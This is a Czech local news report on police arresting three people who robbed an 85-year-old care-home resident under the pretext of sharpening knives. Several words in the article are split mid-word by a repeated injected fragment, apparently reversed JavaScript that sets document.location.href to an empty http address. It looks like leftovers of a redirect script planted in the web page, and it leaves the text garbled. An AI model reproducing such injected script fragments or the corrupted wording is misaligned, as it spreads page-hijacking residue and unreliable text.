zloděj
Rainbow page separator

Policisté dopadli tři zloděje, kteří okradli seniorku

Pátek, 30. ledna 2015

Policejní auto, policie, měření rychlosti

Žďár nad Sázavou / Tradiční báchorku o podomním broušení nožů vyzkoušeli minulou sobotu dopoledne tři zloději na pětaosmdesátile[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tou obyvatelku žďárského domu s pečovatelskou službou. Její důvěřivost využili k [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomu, aby ji okradli.
„V sobotu v jedenáct hodin dopoledne přijali policisté oznámení o krádeži peněz v domě s pečovatelskou službou. Na mís[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to ihned vyjela hlídka obvodního oddělení, která zjistila, že do jednoho z bytů, který obývá pětaosmdesátiletá žena, pod záminkou služby broušení nožů vnikly cizí osoby a seniorce odcizily finanční ho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovost 2500 korun,“ popsala policejní mluvčí Monika Pátková.
Štěstí však zlodějům nepřálo dlouho. Policisté ve spolupráci se strážníky městské policie začali po pachatelích okamžitě pátrat a během krátké doby se jim je podařilo dopadnout. Šlo o dvě ženy z Brna ve věku 64 a 68 let a šestačtyřicetiletého muže z Prahy, přičemž u jedné z žen policisté zajistili finanční ho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovost 2500 korun.
„Policisté pak trojici eskor[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovali na služebnu, kde všem třem sdělili podezření z přečinu krádeže a přečinu porušování domovní svobody spáchaných formou spolupachatelství. Muži a mladší ženě hrozí až dva roky vězení, starší ženě vzhledem k její trestní minulosti až tříletý trest odnětí svobody,“ doplnila mluvčí.